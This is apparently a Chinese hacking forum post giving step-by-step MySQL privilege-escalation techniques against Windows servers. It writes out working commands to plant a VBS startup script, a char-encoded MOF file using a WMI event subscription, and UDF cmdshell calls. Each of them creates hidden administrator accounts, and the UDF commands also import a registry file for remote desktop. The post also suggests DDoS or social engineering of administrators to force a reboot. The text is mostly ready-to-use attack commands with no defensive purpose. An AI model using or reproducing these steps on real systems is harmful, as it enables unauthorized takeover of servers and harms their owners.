  • mysql提权常用方法。 hack某某

    一般是root权限,知道mysql root权限,root账号密码

    启动项提权:
    原理:利用高权限的root写入一个vbs脚本到启动项,再通过一些方法如ddos,社工管理员之类的方法来让服务器重启,运行脚本,达到提取目的
    1、查看我们进入数据库中有些什么数据表
    mysql>show tables;
    默认的情况下,test中没有任何表的存在。
    以下为关键的部分
    2、在TEST数据库下创建一个新的表;
    mysql>create table a (cmd text);
    好了,我们创建了一个新的表,表名为a,表中只存放一个字段,字段名为cmd,为text文本。
    3、在表中插入内容
    mysql>insert into a values (“set wshshell=createobject (“”wscript.shell””)”);
    mysql>insert into a values (“a=wshshell.run (“”cmd.exe /c net user 1 1 /add””,0)”);
    mysql>insert into a values (“b=wshshell.run (“”cmd.exe /c net localgroup Administrators 1 /add””,0)”);
    注意双引号和括号以及后面的“0”一定要输入!我们将用这三条命令来建立一个VBS的脚本程序!
    4、好了,现在我们来看看表a中有些什么
    mysql>select * from a;
    我们将会看到表中有三行数据,就是我们刚刚输入的内容,确认你输入的内容无误后,我们来到下一步
    5、输出表为一个VBS的脚本文件
    mysql>select * from a into outfile “c://docume~1//administrator//「开始」菜单//程序//启动//digo8.vbs”;
    6.重启即可!

    Mof提权:
    mysql mof漏洞介绍:
    http://www.exploit-db.com/exploits/23083/
    http://www.exploit-db.com/sploits/23083.zip

    mof文件内容为:

    #pragma namespace(“\\.\root\subscription”)

    instance of __EventFilter as $EventFilter
    {
    EventNamespace = “Root\Cimv2”;
    Name = “filtP2”;
    Query = “Select * From __InstanceModificationEvent ”
    “Where TargetInstance Isa ”Win32_LocalTime” ”
    “And TargetInstance.Second = 5”;
    QueryLanguage = “WQL”;
    };

    instance of ActiveScriptEventConsumer as $Consumer
    {
    Name = “consPCSV2”;
    ScriptingEngine = “JScript”;
    ScriptText =
    “var WSH = new ActiveXObject(”WScript.Shell”) WSH.run(”net.exe user admin admin /add”)”;
    };

    instance of __FilterToConsumerBinding
    {
    Consumer = $Consumer;
    Filter = $EventFilter;
    };

    效果就是添加一个用户admin密码admin;

    select char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into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;

    效果就是添加一个用户admin密码admin; 管理组

    SELECT CHAR(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101,110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97,109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,116,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,110,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32,32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105,112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,117,115,101,114,32,97,100,109,105,110,32,97,100,109,105,110,32,47,97
,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) INTO dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;

    现在默认它还是会过5s添加一次用户,解决方法就是:
    第一 net stop winmgmt 停止服务,
    第二 删除文件夹:C:WINDOWSsystem32wbemRepository
    第三 net start winmgmt 启动服务

    UDF提权,推荐暗月的一款脚本

    当然也可以dos下直接连接数据库,执行下列语句,方法大同小异
    create function cmdshell returns string soname ‘udf.dll’
    select cmdshell(‘net user iis_user 123!@#abcABC /add’);
    select cmdshell(‘net localgroup administrators iis_user /add’);
    select cmdshell(‘regedit /s d:web3389.reg’);
    drop function cmdshell;
    select cmdshell(‘netstat -an’);

    我还是那个帅气的某某

    qq2553083572
